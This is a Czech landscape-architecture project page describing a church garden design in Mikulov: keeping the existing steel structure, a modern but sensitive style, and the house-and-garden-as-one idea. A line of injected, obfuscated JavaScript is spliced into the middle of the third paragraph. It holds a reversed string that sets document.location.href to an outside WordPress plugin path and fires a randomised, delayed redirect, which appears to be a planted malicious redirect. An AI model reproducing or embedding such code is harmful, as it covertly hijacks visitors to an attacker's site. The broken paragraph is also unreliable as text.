Galerie projektu

Zahrada ECM v Mikulově

Církevní zahrada je místem, kde se lidé setkávají po bohoslužbě, kde si mezi sebou vyprávějí, kde si hrají děti, griluje se, případně si pan farář odpočine při zapadajícím slunci.

V návrhu se počítá s ponecháním stávající ocelové konstrukce. Ta po rekonstrukci bude představovat centrální část zahrady. Našim cílem bylo vytvořit příjemné prostředí moderního charakteru, ale citlivě navazující na současné konstrukce (stará cihlová zeď, ocelová konstrukce apod.)

Ideálem není mít dům a někde vzadu zahradu. Ideálem je mít dům se zahratog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}dou, propojené v jeden organismus – tak, jak naše vlasy a hlava. Vlasy bez hlavy jsou jen vlasy bez hlavy…


Naše projekty

{{project.title}}

{{project.location}}

Nahrávam

Přehled všech projektů


Kontaktujte nás

V případě, že máte dotazy, potřebujete konzultovat svůj záměr, nebo chcete usměrnit svou představu, neváhejte se na nás obrátit. Jsme připraveni se s Vámi podelit o naše nápady a zkušenosti. Anebo nám napište jen tak.

Napište nám